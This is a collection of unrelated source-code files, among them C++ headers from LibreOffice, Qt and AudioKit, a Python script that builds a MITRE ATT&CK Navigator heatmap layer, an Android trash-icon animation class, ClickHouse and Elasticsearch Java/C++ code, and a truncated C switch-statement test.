*/ virtual OUString SAL_CALL getLocalName() throw (RuntimeException); /** The namespace URI of this node, or null if it is unspecified. */ virtual OUString SAL_CALL getNamespaceURI() throw (RuntimeException); /** The node immediately following this node. */ virtual Reference< XNode > SAL_CALL getNextSibling() throw (RuntimeException); /** The name of this node, depending on its type; see the table above. -- virtual implemented by actual node types */ virtual OUString SAL_CALL getNodeName() throw (RuntimeException); /** A code representing the type of the underlying object, as defined above. */ virtual NodeType SAL_CALL getNodeType() throw (RuntimeException); /** The value of this node, depending on its type; see the table above. -- virtual implemented by actual node types */ virtual OUString SAL_CALL getNodeValue() throw (RuntimeException); /** The Document object associated with this node. */ virtual Reference< XDocument > SAL_CALL getOwnerDocument() throw (RuntimeException); /** The parent of this node. */ virtual Reference< XNode > SAL_CALL getParentNode() throw (RuntimeException); /** The namespace prefix of this node, or null if it is unspecified. */ virtual OUString SAL_CALL getPrefix() throw (RuntimeException); /** The node immediately preceding this node. */ virtual Reference< XNode > SAL_CALL getPreviousSibling() throw (RuntimeException); /** Returns whether this node (if it is an element) has any attributes. */ virtual sal_Bool SAL_CALL hasAttributes() throw (RuntimeException); /** Returns whether this node has any children. */ virtual sal_Bool SAL_CALL hasChildNodes() throw (RuntimeException); /** Inserts the node newChild before the existing child node refChild. */ virtual Reference< XNode > SAL_CALL insertBefore( const Reference< XNode >& newChild, const Reference< XNode >& refChild) throw (RuntimeException, DOMException); /** Tests whether the DOM implementation implements a specific feature and that feature is supported by this node. 
*/ virtual sal_Bool SAL_CALL isSupported(const OUString& feature, const OUString& ver) throw (RuntimeException); /** Puts all Text nodes in the full depth of the sub-tree underneath this Node, including attribute nodes, into a "normal" form where only structure (e.g., elements, comments, processing instructions, CDATA sections, and entity references) separates Text nodes, i.e., there are neither adjacent Text nodes nor empty Text nodes. */ virtual void SAL_CALL normalize() throw (RuntimeException); /** Removes the child node indicated by oldChild from the list of children, and returns it. */ virtual Reference< XNode > SAL_CALL removeChild(const Reference< XNode >& oldChild) throw (RuntimeException, DOMException); /** Replaces the child node oldChild with newChild in the list of children, and returns the oldChild node. */ virtual Reference< XNode > SAL_CALL replaceChild( const Reference< XNode >& newChild, const Reference< XNode >& oldChild) throw (RuntimeException, DOMException); /** The value of this node, depending on its type; see the table above. */ virtual void SAL_CALL setNodeValue(const OUString& nodeValue) throw (RuntimeException, DOMException); /** The namespace prefix of this node, or null if it is unspecified. 
*/ virtual void SAL_CALL setPrefix(const OUString& prefix) throw (RuntimeException, DOMException); // --- XEventTarget virtual void SAL_CALL addEventListener(const OUString& eventType, const Reference< XEventListener >& listener, sal_Bool useCapture) throw (RuntimeException); virtual void SAL_CALL removeEventListener(const OUString& eventType, const Reference< XEventListener >& listener, sal_Bool useCapture) throw (RuntimeException); virtual sal_Bool SAL_CALL dispatchEvent(const Reference< XEvent >& evt) throw(RuntimeException, EventException); // --- XUnoTunnel virtual ::sal_Int64 SAL_CALL getSomething(Sequence< ::sal_Int8 > const& rId) throw (RuntimeException); }; /// eliminate redundant namespace declarations void nscleanup(const xmlNodePtr aNode, const xmlNodePtr aParent); } #endif
4,666
344
<filename>ASM/c/weather.h #ifndef WEATHER_H #define WEATHER_H void override_weather_state(); #endif
41
446
<gh_stars>100-1000 import argparse import requests import json from stix2 import MemoryStore, Filter import random def generate(): """parse the STIX on MITRE/CTI and return a layer dict with techniques with randomized scores""" # import the STIX data from MITRE/CTI stix = requests.get("https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json").json() ms = MemoryStore(stix_data=stix["objects"]) # get all techniques in STIX techniques = ms.query([ Filter("type", "=", "attack-pattern") ]) # parse techniques into layer format techniques_list = [] for technique in techniques: # skip deprecated and revoked if ("x_mitre_deprecated" in technique and technique["x_mitre_deprecated"]) or ("revoked" in technique and technique["revoked"]): continue techniqueID = technique["external_references"][0]["external_id"] # get the attackID techniques_list.append({ "techniqueID": techniqueID, "score": random.randint(1,100) # random score }) # return the techniques in a layer dict return { "name": "heatmap example", "versions": { "layer": "4.1", "navigator": "4.1" }, "sorting": 3, # descending order of score "description": "An example layer where all techniques have a randomized score", "domain": "enterprise-attack", "techniques": techniques_list, } if __name__ == '__main__': # download data depending on domain parser = argparse.ArgumentParser( description="Generates a layer wherein all techniques have randomized scores from 1-100." ) parser.add_argument("--output", type=str, default="heatmap_layer.json", help="output filepath" ) args = parser.parse_args() # get the layer layer = generate() # write the layerfile with open(args.output, "w") as f: print("writing", args.output) f.write(json.dumps(layer, indent=4))
770
2,706
<gh_stars>1000+ /* Copyright (c) 2013-2015 <NAME> * * This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ #pragma once #include <QColor> #include <QWidget> #include <QVector> namespace QGBA { class Swatch : public QWidget { Q_OBJECT public: Swatch(QWidget* parent = nullptr); void setDimensions(const QSize&); void setSize(int size); public slots: void setColor(int index, uint16_t); void setColor(int index, uint32_t); signals: void indexPressed(int index); protected: void paintEvent(QPaintEvent*) override; void mousePressEvent(QMouseEvent*) override; private: int m_size = 10; QVector<QColor> m_colors; QPixmap m_backing; QSize m_dims; void updateFill(int index); }; }
310
503
package com.smartisanos.sidebar.view;

import android.animation.Animator;
import android.animation.AnimatorSet;
import android.animation.ObjectAnimator;
import android.content.Context;
import android.content.res.Resources;
import android.view.View;
import android.widget.ImageView;

import com.smartisanos.sidebar.R;
import com.smartisanos.sidebar.action.UninstallAction;
import com.smartisanos.sidebar.util.Constants;
import com.smartisanos.sidebar.util.LOG;
import com.smartisanos.sidebar.util.anim.Anim;
import com.smartisanos.sidebar.util.anim.AnimInterpolator;
import com.smartisanos.sidebar.util.anim.AnimListener;
import com.smartisanos.sidebar.util.anim.AnimTimeLine;
import com.smartisanos.sidebar.view.SidebarRootView.DragView;

/**
 * Controls the "trash" target shown at the bottom of the screen while an app
 * icon is being dragged. The trash has three states (hidden / shown / floated
 * up) driven by one-shot translate animations, and a "rock" (wobble) loop for
 * an icon parked on the trash. Dropping an icon inside the uninstall react
 * area triggers an {@link UninstallAction} confirmation dialog.
 */
public class Trash {
    private static final LOG log = LOG.getInstance(Trash.class);

    private Context mContext;
    public ImageView mTrashView;            // trash icon layer
    public ImageView mTrashForegroundView;  // overlay drawn above the dragged icon
    public int mTrashWidth;
    public int mTrashHeight;
    public int mWindowWidth;
    public int mWindowHeight;
    public int mTrashDisplayHeight;   // visible height when the trash is shown
    public int mTrashFloatUpHeight;   // extra lift while an icon hovers over it

    // Hit rectangles as {left, top, right, bottom}; filled in initTrashView().
    public int [] trash_react_area = new int[4];
    public int [] trash_uninstall_react_area = new int[4];

    // Trash state machine values; see mTrashStatus.
    public static final int TRASH_HIDE = 1;
    public static final int TRASH_SHOW = 2;
    public static final int TRASH_FLOAT = 3;
    private int mTrashStatus = TRASH_HIDE;

    private UninstallAction mUninstallAction;

    public Trash(Context context, ImageView trashView, ImageView trashForegroundView) {
        mContext = context;
        mTrashView = trashView;
        mTrashForegroundView = trashForegroundView;
        Resources resources = mContext.getResources();
        // NOTE(review): stray double semicolon below (harmless).
        mTrashWidth = resources.getInteger(R.integer.trash_width);;
        mTrashHeight = resources.getInteger(R.integer.trash_height);
        mTrashDisplayHeight = resources.getInteger(R.integer.trash_display_height);
        mTrashFloatUpHeight = resources.getInteger(R.integer.trash_float_up_height);
        mWindowWidth = Constants.WindowWidth;
        mWindowHeight = Constants.WindowHeight;
    }

    /**
     * True if (x, y) falls inside the trash hover rectangle.
     * A zero left edge means initTrashView() has not run yet.
     */
    public boolean inTrashReactArea(float x, float y) {
        if (trash_react_area[0] == 0) {
            return false;
        }
        if (trash_react_area[0] < x && x < trash_react_area[2]) {
            if (y > trash_react_area[1]) {
                return true;
            }
        }
        return false;
    }

    /**
     * True if (x, y) falls inside the (taller) uninstall-drop rectangle.
     */
    public boolean inTrashUninstallReactArea(float x, float y) {
        if (trash_uninstall_react_area[0] == 0) {
            return false;
        }
        if (trash_uninstall_react_area[0] < x && x < trash_uninstall_react_area[2]) {
            if (y > trash_uninstall_react_area[1]) {
                return true;
            }
        }
        return false;
    }

    /** Float the trash up when the drag enters its area, drop it back otherwise. */
    public void dragObjectMoveTo(float x, float y) {
        if (inTrashReactArea(x, y)) {
            //in trash area
            trashFloatUpWithAnim(null);
        } else {
            //out trash area
            trashFallDownWithAnim();
        }
    }

    /** Dismiss the uninstall confirmation dialog, if one is showing. */
    public void dismissDialog() {
        if (mUninstallAction != null) {
            mUninstallAction.dismissDialog();
        }
    }

    /**
     * Handle the drag release. Returns false when the drop happened outside the
     * uninstall area; otherwise snaps the icon onto the trash and opens the
     * uninstall dialog.
     */
    public boolean dragObjectUpOnUp(float x, float y, DragView dragView) {
        if (!inTrashUninstallReactArea(x, y)) {
            return false;
        }
        //move icon to trash
        moveIconToTrash(dragView);
        mUninstallAction = new UninstallAction(mContext, dragView);
        mUninstallAction.showUninstallDialog();
        return true;
    }

    /**
     * Reset the trash: park it just below the bottom edge (translationY =
     * window height) and compute both hit rectangles around the horizontal
     * center of the window.
     */
    public void initTrashView() {
        mTrashStatus = TRASH_HIDE;
        mTrashView.setVisibility(View.GONE);
        int trashViewWidth = mTrashView.getWidth();
        if (trashViewWidth == 0) {
            // view not measured yet; fall back to the configured width
            trashViewWidth = mTrashWidth;
        }
        int locX = mWindowWidth / 2 - trashViewWidth / 2;
        int locY = mWindowHeight;
        mTrashView.setTranslationX(locX);
        mTrashView.setTranslationY(locY);
        mTrashView.setVisibility(View.VISIBLE);
        trash_react_area = new int[4];
        //left-top, right-bottom
        int left = mWindowWidth / 2 - mTrashWidth / 2;
        int top = mWindowHeight - mTrashHeight / 2;
        int right = mWindowWidth / 2 + mTrashWidth / 2;
        int bottom = mWindowHeight;
        trash_react_area[0] = left;
        trash_react_area[1] = top;
        trash_react_area[2] = right;
        trash_react_area[3] = bottom;
        // the uninstall area is taller: it starts a full trash-height above the bottom
        trash_uninstall_react_area[0] = left;
        trash_uninstall_react_area[1] = mWindowHeight - mTrashHeight;
        trash_uninstall_react_area[2] = right;
        trash_uninstall_react_area[3] = bottom;
    }

    /** Hide the trash view immediately, without animation. */
    public void hideTrashView() {
        if (mTrashView == null) {
            return;
        }
        mTrashView.setVisibility(View.GONE);
    }

    // guards trashAppearWithAnim/trashDisappearWithAnim against re-entry
    private boolean trashAnimRunning = false;

    /** Slide the trash up from below the screen edge into its shown position. */
    public void trashAppearWithAnim() {
        if (mTrashStatus != TRASH_HIDE) {
            return;
        }
        if (trashAnimRunning) {
            log.error("trashAppearWithAnim return by trashAppearAnimRunning true");
            return;
        }
        mTrashView.setTranslationX(mWindowWidth / 2 - mTrashView.getWidth() / 2);
        int fromY = mWindowHeight;
        int toY = mWindowHeight - mTrashDisplayHeight;
        Vector3f from = new Vector3f(0, fromY);
        Vector3f to = new Vector3f(0, toY);
        Anim anim = new Anim(mTrashView, Anim.TRANSLATE, 200, Anim.CUBIC_OUT, from, to);
        anim.setListener(new AnimListener() {
            @Override
            public void onStart() {
                trashAnimRunning = true;
                // re-center: width may only be valid after layout
                int width = mTrashView.getWidth();
                mTrashView.setTranslationX(mWindowWidth / 2 - width / 2);
            }

            @Override
            public void onComplete(int type) {
                trashAnimRunning = false;
                mTrashStatus = TRASH_SHOW;
                log.error("trashAppearWithAnim onComplete");
            }
        });
        anim.start();
    }

    /**
     * Slide the trash (and its foreground overlay, if visible) down off-screen.
     * @param callback run once the trash is hidden (or immediately if the
     *                 timeline fails to start)
     */
    public void trashDisappearWithAnim(final Runnable callback) {
        if (mTrashStatus == TRASH_HIDE) {
            return;
        }
        if (trashAnimRunning) {
            log.error("trashDisappearWithAnim return by trashDisappearAnimRunning true");
            return;
        }
        Vector3f from = new Vector3f(0, mTrashView.getTranslationY());
        Vector3f to = new Vector3f(0, mWindowHeight);
        int time = 200;
        AnimTimeLine timeLine = new AnimTimeLine();
        if (mTrashForegroundView.getVisibility() == View.VISIBLE) {
            Anim anim = new Anim(mTrashForegroundView, Anim.TRANSLATE, time, Anim.CUBIC_OUT, from, to);
            anim.setListener(new AnimListener() {
                @Override
                public void onStart() {
                }

                @Override
                public void onComplete(int type) {
                    mTrashForegroundView.setVisibility(View.GONE);
                }
            });
            timeLine.addAnim(anim);
        }
        Anim anim = new Anim(mTrashView, Anim.TRANSLATE, time, Anim.CUBIC_OUT, from, to);
        timeLine.setAnimListener(new AnimListener() {
            @Override
            public void onStart() {
                trashAnimRunning = true;
            }

            @Override
            public void onComplete(int type) {
                trashAnimRunning = false;
                mTrashStatus = TRASH_HIDE;
                if (callback != null) {
                    callback.run();
                }
            }
        });
        timeLine.addAnim(anim);
        if (!timeLine.start()) {
            // timeline refused to start: apply the end state synchronously
            trashAnimRunning = false;
            mTrashStatus = TRASH_HIDE;
            if (callback != null) {
                callback.run();
            }
        }
    }

    private boolean mTrashUpAnimRunning = false;
    private boolean mTrashDownAnimRunning = false;

    /**
     * Lift the trash by mTrashFloatUpHeight (hover feedback).
     * @param runnable run after the lift completes
     */
    public void trashFloatUpWithAnim(final Runnable runnable) {
        if (mTrashStatus == TRASH_FLOAT) {
            return;
        }
        if (mTrashUpAnimRunning) {
            log.error("trashFloatUpWithAnim return by mTrashUpAnimRunning true");
            return;
        }
        mTrashUpAnimRunning = true;
        int fromY = (int) mTrashView.getY();
        int toY = mWindowHeight - mTrashDisplayHeight - mTrashFloatUpHeight;
        Vector3f from = new Vector3f(0, fromY);
        Vector3f to = new Vector3f(0, toY);
        Anim anim = new Anim(mTrashView, Anim.TRANSLATE, 100, Anim.CUBIC_OUT, from, to);
        anim.setListener(new AnimListener() {
            @Override
            public void onStart() {
            }

            @Override
            public void onComplete(int type) {
                mTrashStatus = TRASH_FLOAT;
                mTrashUpAnimRunning = false;
                if (runnable != null) {
                    runnable.run();
                }
            }
        });
        anim.start();
    }

    /** Drop the trash back from the floated position to the shown position. */
    public void trashFallDownWithAnim() {
        if (mTrashStatus != TRASH_FLOAT) {
            return;
        }
        if (mTrashDownAnimRunning) {
            log.error("trashFallDownWithAnim return by mTrashDownAnimRunning true");
            return;
        }
        mTrashDownAnimRunning = true;
        Vector3f from = new Vector3f(0, mTrashView.getY());
        Vector3f to = new Vector3f(0, mWindowHeight - mTrashDisplayHeight);
        Anim anim = new Anim(mTrashView, Anim.TRANSLATE, 100, Anim.CUBIC_OUT, from, to);
        anim.setListener(new AnimListener() {
            @Override
            public void onStart() {
            }

            @Override
            public void onComplete(int type) {
                mTrashDownAnimRunning = false;
                mTrashStatus = TRASH_SHOW;
            }
        });
        anim.start();
    }

    /**
     * Animate the dragged icon onto the floated trash, then start the wobble
     * loop. Floats the trash up first if it is not floated yet.
     */
    public void moveIconToTrash(final SidebarRootView.DragView dragView) {
        View view = dragView.mView;
        if (view == null) {
            return;
        }
        dragView.setBubbleVisibleStatus(View.INVISIBLE);
        int viewWidth = view.getWidth();
        int viewHeight = view.getHeight();
        float fromX = view.getX();
        float fromY = view.getY();
        // target: centered horizontally, resting on top of the floated trash
        float toX = mWindowWidth / 2 - viewWidth / 2;
        float toY = mWindowHeight - mTrashDisplayHeight - mTrashFloatUpHeight - viewHeight;
        Vector3f from = new Vector3f(fromX, fromY);
        Vector3f to = new Vector3f(toX, toY);
        Anim anim = new Anim(view, Anim.TRANSLATE, 200, Anim.CUBIC_OUT, from, to);
        anim.setListener(new AnimListener() {
            @Override
            public void onStart() {
            }

            @Override
            public void onComplete(int type) {
                if (mTrashStatus != TRASH_FLOAT) {
                    Runnable runnable = new Runnable() {
                        @Override
                        public void run() {
                            rockOnTrash(dragView.mView);
                        }
                    };
                    trashFloatUpWithAnim(runnable);
                } else {
                    rockOnTrash(dragView.mView);
                }
            }
        });
        anim.start();
    }

    private boolean rockRepeat = false;    // keep restarting the wobble loop while true
    private AnimatorSet mRockAnimSet;

    /**
     * Start the wobble ("rock") loop on `view`: a 4-step AnimatorSet that is
     * restarted from its listener for as long as rockRepeat stays true.
     */
    public void rockOnTrash(View view) {
        if (mRockAnimSet != null) {
            mRockAnimSet = null;
        }
        float rockAngle = 2.0f;
        float offset = 2.0f;
        float locX = view.getX();
        float locY = view.getY();
        //init view loc and rotate
        rockRepeat = true;
        view.setTranslationX(locX - offset);
        view.setTranslationY(locY + offset);
        view.setRotation(-rockAngle);
        Vector3f loc = new Vector3f(locX, locY);
        mRockAnimSet = generateRockAnimSet(view, loc);
        RockAnimListener listener = new RockAnimListener(view, loc);
        mRockAnimSet.addListener(listener);
        mRockAnimSet.start();
    }

    /** Stop the wobble loop; ends or cancels any in-flight AnimatorSet. */
    public void stopRock() {
        rockRepeat = false;
        if (mRockAnimSet != null) {
            if (mRockAnimSet.isStarted()) {
                if (mRockAnimSet.isRunning()) {
                    mRockAnimSet.end();
                } else {
                    mRockAnimSet.cancel();
                }
            }
        }
        // }
    }

    /**
     * Restarts the wobble AnimatorSet on completion while rockRepeat is true,
     * producing a continuous loop without ObjectAnimator repeat modes.
     */
    private class RockAnimListener implements Animator.AnimatorListener {
        private View mView;
        private Vector3f mLoc;   // the view's rest position the wobble oscillates around

        public RockAnimListener(View view, Vector3f loc) {
            mView = view;
            mLoc = loc;
        }

        @Override
        public void onAnimationStart(Animator animator) {
        }

        @Override
        public void onAnimationEnd(Animator animator) {
            if (rockRepeat) {
                mRockAnimSet = generateRockAnimSet(mView, mLoc);
                RockAnimListener listener = new RockAnimListener(mView, mLoc);
                mRockAnimSet.addListener(listener);
                mRockAnimSet.start();
            }
        }

        @Override
        public void onAnimationCancel(Animator animator) {
        }

        @Override
        public void onAnimationRepeat(Animator animator) {
        }
    }

    /**
     * Build one wobble cycle: four 70 ms steps that move the view between the
     * four corners of a small square around `loc` while flipping its rotation
     * between -2 and +2 degrees.
     */
    private AnimatorSet generateRockAnimSet(View view, Vector3f loc) {
        float rockAngle = 2.0f;
        float offset = 2.0f;
        long interval_time = 70;
        AnimInterpolator.Interpolator interpolator = new AnimInterpolator.Interpolator(Anim.CIRC_IN_OUT);
        AnimatorSet animSet = new AnimatorSet();
        //step 1: bottom-left -> top-right
        ObjectAnimator anim1_translateX = ObjectAnimator.ofFloat(view, Anim.X, loc.x - offset, loc.x + offset);
        anim1_translateX.setDuration(interval_time);
        anim1_translateX.setInterpolator(interpolator);
        ObjectAnimator anim1_translateY = ObjectAnimator.ofFloat(view, Anim.Y, loc.y + offset, loc.y - offset);
        anim1_translateY.setDuration(interval_time);
        anim1_translateY.setInterpolator(interpolator);
        animSet.play(anim1_translateX).with(anim1_translateY);
        //step 2: rotate to +angle while dropping on the right edge (X held constant)
        ObjectAnimator anim2_rotate = ObjectAnimator.ofFloat(view, Anim.ROTATION, -rockAngle, rockAngle);
        anim2_rotate.setDuration(interval_time);
        anim2_rotate.setInterpolator(interpolator);
        ObjectAnimator anim2_translateX = ObjectAnimator.ofFloat(view, Anim.X, loc.x + offset, loc.x + offset);
        anim2_translateX.setDuration(interval_time);
        anim2_translateX.setInterpolator(interpolator);
        ObjectAnimator anim2_translateY = ObjectAnimator.ofFloat(view, Anim.Y, loc.y - offset, loc.y + offset);
        anim2_translateY.setDuration(interval_time);
        anim2_translateY.setInterpolator(interpolator);
        animSet.play(anim2_rotate).with(anim2_translateX).with(anim2_translateY).after(anim1_translateX);
        //step 3: bottom-right -> top-left
        ObjectAnimator anim3_translateX = ObjectAnimator.ofFloat(view, Anim.X, loc.x + offset, loc.x - offset);
        anim3_translateX.setDuration(interval_time);
        anim3_translateX.setInterpolator(interpolator);
        ObjectAnimator anim3_translateY = ObjectAnimator.ofFloat(view, Anim.Y, loc.y + offset, loc.y - offset);
        anim3_translateY.setDuration(interval_time);
        anim3_translateY.setInterpolator(interpolator);
        animSet.play(anim3_translateX).with(anim3_translateY).after(anim2_rotate);
        //step 4: rotate back to -angle while dropping on the left edge (X held constant)
        ObjectAnimator anim4_rotate = ObjectAnimator.ofFloat(view, Anim.ROTATION, rockAngle, -rockAngle);
        anim4_rotate.setDuration(interval_time);
        anim4_rotate.setInterpolator(interpolator);
        ObjectAnimator anim4_translateX = ObjectAnimator.ofFloat(view, Anim.X, loc.x - offset, loc.x - offset);
        anim4_translateX.setDuration(interval_time);
        anim4_translateX.setInterpolator(interpolator);
        ObjectAnimator anim4_translateY = ObjectAnimator.ofFloat(view, Anim.Y, loc.y - offset, loc.y + offset);
        anim4_translateY.setDuration(interval_time);
        anim4_translateY.setInterpolator(interpolator);
        animSet.play(anim4_rotate).with(anim4_translateX).with(anim4_translateY).after(anim3_translateX);
        return animSet;
    }
}
7,647
395
// Copyright AudioKit. All Rights Reserved. Revision History at http://github.com/AudioKit/AudioKit/ #pragma once #ifdef __cplusplus #define ZT_API extern "C" #else #define ZT_API #endif typedef struct PitchTracker *PitchTrackerRef; ZT_API PitchTrackerRef ztPitchTrackerCreate(unsigned int sampleRate, int hopSize, int peakCount); ZT_API void ztPitchTrackerDestroy(PitchTrackerRef); ZT_API void ztPitchTrackerAnalyze(PitchTrackerRef tracker, float* frames, unsigned int count); ZT_API void ztPitchTrackerGetResults(PitchTrackerRef tracker, float* trackedAmplitude, float* trackedFrequency);
189
15,577
<gh_stars>1000+
#include <Core/SortDescription.h>
#include <Core/Block.h>
#include <IO/Operators.h>
#include <Common/JSONBuilder.h>

namespace DB
{

/// Write a human-readable, comma-separated dump of `description` into `out`.
/// Columns referenced by position are resolved against `header` when possible;
/// "?" is printed for out-of-range positions.
void dumpSortDescription(const SortDescription & description, const Block & header, WriteBuffer & out)
{
    bool first = true;

    for (const auto & desc : description)
    {
        if (!first)
            out << ", ";
        first = false;

        if (!desc.column_name.empty())
            out << desc.column_name;
        else
        {
            /// Positional reference: try to resolve the name from the header.
            if (desc.column_number < header.columns())
                out << header.getByPosition(desc.column_number).name;
            else
                out << "?";

            out << " (pos " << desc.column_number << ")";
        }

        if (desc.direction > 0)
            out << " ASC";
        else
            out << " DESC";

        if (desc.with_fill)
            out << " WITH FILL";
    }
}

/// Serialize one sort column into a JSON map ("Column"/"Position",
/// "Ascending", "With Fill") for EXPLAIN output.
void SortColumnDescription::explain(JSONBuilder::JSONMap & map, const Block & header) const
{
    if (!column_name.empty())
        map.add("Column", column_name);
    else
    {
        if (column_number < header.columns())
            map.add("Column", header.getByPosition(column_number).name);

        map.add("Position", column_number);
    }

    map.add("Ascending", direction > 0);
    map.add("With Fill", with_fill);
}

/// Convenience overload: dump against an empty header (positional columns
/// print as "? (pos N)") and return the result as a string.
std::string dumpSortDescription(const SortDescription & description)
{
    WriteBufferFromOwnString wb;
    dumpSortDescription(description, Block{}, wb);
    return wb.str();
}

/// Build a JSON array with one map per sort column, for EXPLAIN output.
JSONBuilder::ItemPtr explainSortDescription(const SortDescription & description, const Block & header)
{
    auto json_array = std::make_unique<JSONBuilder::JSONArray>();
    for (const auto & descr : description)
    {
        auto json_map = std::make_unique<JSONBuilder::JSONMap>();
        descr.explain(*json_map, header);
        json_array->add(std::move(json_map));
    }

    return json_array;
}

}
817
1,125
<reponame>ZenMX/elasticsearch
/*
 * Licensed to Elasticsearch under one or more contributor
 * license agreements. See the NOTICE file distributed with
 * this work for additional information regarding copyright
 * ownership. Elasticsearch licenses this file to you under
 * the Apache License, Version 2.0 (the "License"); you may
 * not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied.  See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */

package org.elasticsearch.index.reindex;

import org.elasticsearch.action.ActionListener;
import org.elasticsearch.common.util.concurrent.AtomicArray;

import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.concurrent.atomic.AtomicInteger;

import static java.util.Collections.unmodifiableList;

/**
 * Tracks the state of sliced subtasks and provides unified status information for a sliced BulkByScrollRequest.
 */
public class LeaderBulkByScrollTaskState {

    private final BulkByScrollTask task;
    private final int slices;

    /**
     * Holds the responses of slice workers as they come in
     */
    private final AtomicArray<Result> results;

    /**
     * How many subtasks are still running
     */
    private final AtomicInteger runningSubtasks;

    public LeaderBulkByScrollTaskState(BulkByScrollTask task, int slices) {
        this.task = task;
        this.slices = slices;
        results = new AtomicArray<>(slices);
        runningSubtasks = new AtomicInteger(slices);
    }

    /**
     * Returns the number of slices this BulkByScrollRequest will use
     */
    public int getSlices() {
        return slices;
    }

    /**
     * Get the combined statuses of slice subtasks, merged with the given list of statuses
     *
     * @param statuses a mutable list, one slot per slice; slots for finished
     *        slices are overwritten with their recorded status or failure
     * @throws IllegalArgumentException if the list size does not match the slice count
     */
    public BulkByScrollTask.Status getStatus(List<BulkByScrollTask.StatusOrException> statuses) {
        // We only have access to the statuses of requests that have finished so we return them
        if (statuses.size() != results.length()) {
            throw new IllegalArgumentException("Given number of statuses does not match amount of expected results");
        }
        addResultsToList(statuses);
        return new BulkByScrollTask.Status(unmodifiableList(statuses), task.getReasonCancelled());
    }

    /**
     * Get the combined statuses of sliced subtasks
     */
    public BulkByScrollTask.Status getStatus() {
        // start from an all-null list so unfinished slices show as empty slots
        return getStatus(Arrays.asList(new BulkByScrollTask.StatusOrException[results.length()]));
    }

    /**
     * The number of sliced subtasks that are still running
     */
    public int runningSliceSubTasks() {
        return runningSubtasks.get();
    }

    /**
     * Copy each finished slice's outcome (status on success, exception on
     * failure) into its slot of {@code sliceStatuses}.
     */
    private void addResultsToList(List<BulkByScrollTask.StatusOrException> sliceStatuses) {
        for (Result t : results.asList()) {
            if (t.response != null) {
                sliceStatuses.set(t.sliceId, new BulkByScrollTask.StatusOrException(t.response.getStatus()));
            } else {
                sliceStatuses.set(t.sliceId, new BulkByScrollTask.StatusOrException(t.failure));
            }
        }
    }

    /**
     * Record a response from a slice and respond to the listener if the request is finished.
     */
    public void onSliceResponse(ActionListener<BulkByScrollResponse> listener, int sliceId, BulkByScrollResponse response) {
        results.setOnce(sliceId, new Result(sliceId, response));
        /* If the request isn't finished we could automatically rethrottle the sub-requests here but we would only want to do that if we
         * were fairly sure they had a while left to go. */
        recordSliceCompletionAndRespondIfAllDone(listener);
    }

    /**
     * Record a failure from a slice and respond to the listener if the request is finished.
     */
    public void onSliceFailure(ActionListener<BulkByScrollResponse> listener, int sliceId, Exception e) {
        results.setOnce(sliceId, new Result(sliceId, e));
        recordSliceCompletionAndRespondIfAllDone(listener);
        // TODO cancel when a slice fails?
    }

    /**
     * Decrement the running-slice count; when it reaches zero, merge all slice
     * results and complete the listener exactly once — with a combined response
     * if every slice succeeded, otherwise with the first failure (remaining
     * failures attached as suppressed exceptions).
     */
    private void recordSliceCompletionAndRespondIfAllDone(ActionListener<BulkByScrollResponse> listener) {
        if (runningSubtasks.decrementAndGet() != 0) {
            return;
        }
        List<BulkByScrollResponse> responses = new ArrayList<>(results.length());
        Exception exception = null;
        for (Result t : results.asList()) {
            if (t.response == null) {
                assert t.failure != null : "exception shouldn't be null if value is null";
                if (exception == null) {
                    exception = t.failure;
                } else {
                    exception.addSuppressed(t.failure);
                }
            } else {
                assert t.failure == null : "exception should be null if response is not null";
                responses.add(t.response);
            }
        }
        if (exception == null) {
            listener.onResponse(new BulkByScrollResponse(responses, task.getReasonCancelled()));
        } else {
            listener.onFailure(exception);
        }
    }

    /**
     * Outcome of a single slice: exactly one of {@code response} / {@code failure} is non-null.
     */
    private static final class Result {
        final BulkByScrollResponse response;
        final int sliceId;
        final Exception failure;

        private Result(int sliceId, BulkByScrollResponse response) {
            this.sliceId = sliceId;
            this.response = response;
            failure = null;
        }

        private Result(int sliceId, Exception failure) {
            this.sliceId = sliceId;
            this.failure = failure;
            response = null;
        }
    }
}
2,184
313
<gh_stars>100-1000
package com.imperva.apispecparser.parsers.swagger.property;

/**
 * Properties of an authentication scheme parsed from a Swagger/OpenAPI spec.
 */
public interface AuthenticationProperties {
    // Name of the authentication parameter (e.g. the API-key header/field name).
    String getName();

    // Location of the parameter, as an ApiKeyAuthenticationParamType value.
    ApiKeyAuthenticationParamType getIn();
}
65
6,663
<gh_stars>1000+
/* Declares e as one more than d.
 * NOTE(review): `d` is not declared in this chunk — presumably defined
 * elsewhere in the file this fragment belongs to; verify before reuse. */
int e = d+1;
15
1,301
<filename>tests/integration_tests/src/all_switch.c
/* TAGS: min c */
/* LIFT_OPTS: explicit +--explicit_args +--explicit_args_count 8 */
/* LIFT_OPTS: default */
/* TEST: 12 */
/* TEST: 15 */
/*
 * Copyright (c) 2018 Trail of Bits, Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/* Integration-test fixture for a binary-lifting toolchain. The TAGS /
 * LIFT_OPTS / TEST directives above are parsed by the test harness; the
 * dense-then-sparse case values are intentional (they exercise both
 * jump-table and comparison-chain switch lowering), so the switch shape
 * must not be "simplified". */

#include <stdio.h>
#include <stdlib.h>

/* Parse argv[1] as an integer and print which recognized case it hit.
 * Returns -1 when no argument is supplied. */
int main(int argc, const char *argv[]) {
  if(argc < 2) {
    return -1;
  }

  int input = atoi(argv[1]);

  switch(input) {
    case 0:
      printf("Input was zero\n");
      break;
    case 1:
      printf("Input was one\n");
      break;
    case 2:
      printf("Input was two\n");
      break;
    case 4:
      printf("Input was four\n");
      break;
    case 6:
      printf("Input was six\n");
      break;
    case 12:
